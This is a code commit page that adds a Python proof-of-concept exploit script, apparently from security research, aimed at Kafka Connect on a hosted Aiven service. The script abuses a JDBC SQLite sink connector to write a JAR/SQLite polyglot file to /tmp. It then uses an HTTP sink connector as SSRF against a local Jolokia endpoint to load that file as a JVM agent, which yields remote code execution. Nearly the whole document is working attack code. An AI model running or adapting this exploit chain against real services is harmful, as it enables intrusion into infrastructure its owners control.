STRLCPY/helsec-1103

Add poc script
Jari Jääskelä committed 2 years ago

d385c5c4

1 parent d2a852d8

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

Total 1 files

■ ■ ■ ■ ■ ■

pocs/jdbc.py

1	+	import imp
2	+	import requests
3	+	import json
4	+	import random
5	+	import string
6	+	import base64
7	+	import kafka
8	+	import time
9	+	from kafka.admin import KafkaAdminClient, NewTopic
10	+
11	+	# kafka_connect_api_baseurl = "http://localhost:8083"
12	+	kafka_connect_api_baseurl = "https://kafkaconnect-307d41f5-topyte-d458.aivencloud.com"
13	+
14	+	kafka_user = "avnadmin"
15	+	kafka_password = ""
16	+
17	+	# kafka_bootstrap_server = "localhost:9092"
18	+	kafka_bootstrap_server = "kafka-1ee9357b-topyte-d458.aivencloud.com:27393"
19	+
20	+	hostname_payload = ""
21	+
22	+	random_str = ''.join(random.choice(string.ascii_lowercase) for _ in range(2))
23	+
24	+	def create_topic(topic_name):
25	+	admin_client = KafkaAdminClient(
26	+	bootstrap_servers=kafka_bootstrap_server,
27	+	security_protocol="SSL",
28	+	ssl_cafile="aiven-kafka-certs/ca.pem",
29	+	ssl_certfile="aiven-kafka-certs/service.cert",
30	+	ssl_keyfile="aiven-kafka-certs/service.key"
31	+	)
32	+
33	+	topic_list = []
34	+	topic_list.append(NewTopic(name=topic_name, num_partitions=1, replication_factor=1))
35	+	admin_client.create_topics(new_topics=topic_list, validate_only=False)
36	+
37	+
38	+	def upload_polyglot(destination, localpath):
39	+	connector_name = f"jdbc_sqlite_poc_{random_str}"
40	+	topic_name = f"jdbc-sqlite-{random_str}"
41	+
42	+	create_topic(topic_name)
43	+
44	+	connector_url = f"{kafka_connect_api_baseurl}/connectors/{connector_name}"
45	+
46	+	payload = json.dumps({
47	+	# "connector.class":"io.confluent.connect.jdbc.JdbcSinkConnector",
48	+	"connector.class": "io.aiven.connect.jdbc.JdbcSinkConnector",
49	+	"connection.url": f"jdbc:sqlite:{destination}",
50	+	"connection.user": "something",
51	+	"connection.password": "something",
52	+	"name":connector_name,
53	+	"topics": topic_name,
54	+	"key.converter": "org.apache.kafka.connect.storage.StringConverter",
55	+	"value.converter": "org.apache.kafka.connect.json.JsonConverter",
56	+	"value.converter.schemas.enable": "true",
57	+	"auto.create": "true" # Create tables automatically
58	+	})
59	+	headers = {
60	+	'Content-Type': 'application/json'
61	+	}
62	+
63	+	response = requests.request("PUT", f"{connector_url}/config", headers=headers, data=payload, auth=(kafka_user, kafka_password))
64	+	print(response.text)
65	+
66	+	payload_data = None
67	+	with open(localpath, 'rb') as f:
68	+	payload_data = f.read()
69	+
70	+	# Create SQLite - JAR polyglot by submitting the JAR data to the kafka topic.
71	+	# The JDBC Sink Connector adds this data to the sqlite DB
72	+	producer = kafka.KafkaProducer(
73	+	bootstrap_servers=kafka_bootstrap_server,
74	+	security_protocol="SSL",
75	+	ssl_cafile="aiven-kafka-certs/ca.pem",
76	+	ssl_certfile="aiven-kafka-certs/service.cert",
77	+	ssl_keyfile="aiven-kafka-certs/service.key"
78	+	)
79	+	producer.send(topic_name, json.dumps(
80	+	{
81	+	"schema": {
82	+	"type": "struct",
83	+	"fields": [{
84	+	"field": "payload",
85	+	"type": "bytes",
86	+	"optional": False
87	+	}]
88	+	},
89	+	"payload": {
90	+	"payload": base64.b64encode(payload_data).decode('utf-8') # JsonConverter uses com.fasterxml.jackson, which supports binary values as base64 encoded string
91	+	}
92	+	}
93	+	).encode('utf-8'))
94	+	producer.flush()
95	+
96	+	# Payload should now have been executed, delete the connector
97	+	#response = requests.request("DELETE", connector_url, headers=headers, auth=(kafka_user, kafka_password))
98	+	#print(response.text)
99	+
100	+
101	+
102	+	def send_http_post_ssrf(dst_url, body):
103	+	connector_name = f"http_poc_{random_str}"
104	+	topic_name = f"http-{random_str}"
105	+
106	+	create_topic(topic_name)
107	+
108	+	connector_url = f"{kafka_connect_api_baseurl}/connectors/{connector_name}"
109	+
110	+	payload = json.dumps({
111	+	"name": connector_name,
112	+	"connector.class": "io.aiven.kafka.connect.http.HttpSinkConnector",
113	+	"key.converter": "org.apache.kafka.connect.storage.StringConverter",
114	+	"value.converter": "org.apache.kafka.connect.storage.StringConverter",
115	+	"errors.log.enable": "true",
116	+	"errors.log.include.messages": "true",
117	+	"topics": topic_name,
118	+	"http.url": dst_url,
119	+	"http.headers.content.type": "application/json",
120	+	"http.authorization.type": "none"
121	+	})
122	+	headers = {
123	+	'Content-Type': 'application/json'
124	+	}
125	+
126	+	response = requests.request("PUT", f"{connector_url}/config", headers=headers, data=payload, auth=(kafka_user, kafka_password))
127	+	print(response.text)
128	+
129	+	producer = kafka.KafkaProducer(
130	+	bootstrap_servers=kafka_bootstrap_server,
131	+	security_protocol="SSL",
132	+	ssl_cafile="aiven-kafka-certs/ca.pem",
133	+	ssl_certfile="aiven-kafka-certs/service.cert",
134	+	ssl_keyfile="aiven-kafka-certs/service.key"
135	+	)
136	+	producer.send(topic_name, body)
137	+	producer.flush()
138	+
139	+	# Payload should now have been executed, delete the connector
140	+	#response = requests.request("DELETE", connector_url, headers=headers, auth=(kafka_user, kafka_password))
141	+	#print(response.text)
142	+
143	+	agent_jar_name_path = f'/tmp/agent_{random_str}.jar'
144	+
145	+	upload_polyglot(agent_jar_name_path, 'java-agent-1.0-SNAPSHOT.jar')
146	+
147	+	# Wait for jdbc sink to create the sqlite database
148	+	print("Waiting...")
149	+	time.sleep(5)
150	+
151	+	send_http_post_ssrf("http://localhost:6725/jolokia/", json.dumps({
152	+	"type" : "exec",
153	+	"mbean" : "com.sun.management:type=DiagnosticCommand",
154	+	"operation" : "jvmtiAgentLoad",
155	+	"arguments": [agent_jar_name_path]
156	+	}).encode('utf-8'))
157	+
158	+

Add poc script